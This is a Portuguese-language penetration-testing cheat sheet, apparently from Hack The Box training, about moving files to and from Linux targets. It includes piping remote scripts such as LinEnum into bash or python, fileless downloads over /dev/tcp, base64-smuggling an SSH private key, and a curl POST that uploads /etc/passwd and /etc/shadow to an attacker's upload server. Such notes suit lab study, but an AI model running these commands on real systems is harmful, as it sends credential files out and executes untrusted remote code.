Codificação/Decodificação Base64
PwnBox - Verificar hash MD5 do arquivo
PwnBox - Codificar chave SSH para Base64
Copy cat id_rsa |base64 -w 0;echo Linux - Decodificar o arquivo
Copy echo -n 'LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsa Linux - Confirme a correspondência de hashes MD5
Baixar um arquivo usando wget
Copy wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh Baixar um arquivo usando cURL
Copy curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh Executar uma ferramenta diretamente com o cURL
Copy curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash Download sem arquivo com wget
Copy wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 Download with Bash (/dev/tcp)
Conecte-se ao servidor da Web de destino
Copy exec 3<>/dev/tcp/10.10.10.32/80
Copy echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 Downloads SSH
SCP(secure copy) é um utilitário de linha de comando que permite que você copie arquivos e diretórios entre dois hosts com segurança.
Habilitando o servidor SSH
Copy sudo systemctl enable ssh
Copy sudo systemctl start ssh Verificando a porta de escuta SSH
Linux - Baixando arquivos usando SCP
Copy scp plaintext@192.168.49.128:/root/myroot.txt .
Observação: você pode criar uma conta de usuário temporária para transferências de arquivos e evitar usar suas credenciais ou chaves primárias em um computador remoto.
Upload Operations
Pwnbox - Iniciar Servidor Web
Copy sudo python3 -m pip install --user uploadserver Pwnbox - Crie um certificado autoassinado
Copy openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' O servidor web não deve hospedar o certificado. Recomendamos criar um novo diretório para hospedar o arquivo para nosso servidor web.
Pwnbox - Iniciar Servidor Web
Copy mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem Linux - Carregar vários arquivos
Copy curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure Alternative Web File Transfer Method
Linux - Criando um servidor web com Python3
Copy python3 -m http.server Linux - Criando um servidor web com Python2.7
Copy python2.7 -m SimpleHTTPServer Linux - Criando um Servidor Web com PHP
Linux - Criando um Servidor Web com Ruby
Copy ruby -run -ehttpd . -p8000 Baixe o arquivo da máquina de destino para o Pwnbox
Copy wget 192.168.49.128:8000/filetotransfer.txt SCP Upload
Copy scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/ Last updated 8 months ago
